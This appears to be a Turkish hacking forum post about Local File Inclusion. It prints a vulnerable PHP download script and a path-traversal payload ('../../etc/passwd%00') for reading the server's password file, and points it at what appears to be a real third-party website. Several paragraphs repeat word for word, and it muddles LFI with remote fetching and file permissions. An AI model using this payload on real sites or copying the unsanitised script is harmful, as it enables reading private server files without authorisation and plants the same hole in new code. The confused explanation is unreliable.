LFI "Local File Include" kısaltmasından gelir. Ve uzaktan dosya çağırmaya yarar. Bunu yaparken ya terminalı kullanır yada 80 veya 8080 portunu birde bunu çağırması için <?php yi (web yazılımı) kulllanır...
Çekeceğimiz dosyaya gelince Chmod 777 veya 664 olmalıdır. Eğer permlerde kısıtlama varsa dosyaya erişim olmaz..Aşağıda vereceğim <?php dosyasında LFI açığı vardır.Önemli bir scripttin download.php dosyasıdır.
Server Linux olduğu için explotide budur..
/downloadfile.php?filename=../../../../../../../../../../etc/passwd%00
Örnek verilecek olursak : http://www.chinmaya.org/downloadfile.../../etc/passwd
Php.ini
Çekeceğimiz dosyaya gelince Chmod 777 veya 664 olmalıdır. Eğer permlerde kısıtlama varsa dosyaya erişim olmaz..Aşağıda vereceğim <?php dosyasında LFI açığı vardır.Önemli bir scripttin download.php dosyasıdır.
PHP:
<?
$filename = $filename;
$ext = substr(strrchr($filename, "."), 1);
$bytes = filesize("downloadfile/$filename");
header("Content-type: application/$ext");
header("Content-disposition: attachment; filename=\"$filename\"");
header("Content-length: $bytes");
@readfile("downloadfile/$filename");
?>
Server Linux olduğu için explotide budur..
/downloadfile.php?filename=../../../../../../../../../../etc/passwd%00
Örnek verilecek olursak : http://www.chinmaya.org/downloadfile.../../etc/passwd
Php.ini
PHP:
php.ini
magic_quotes_gpc = Off
register_globals = On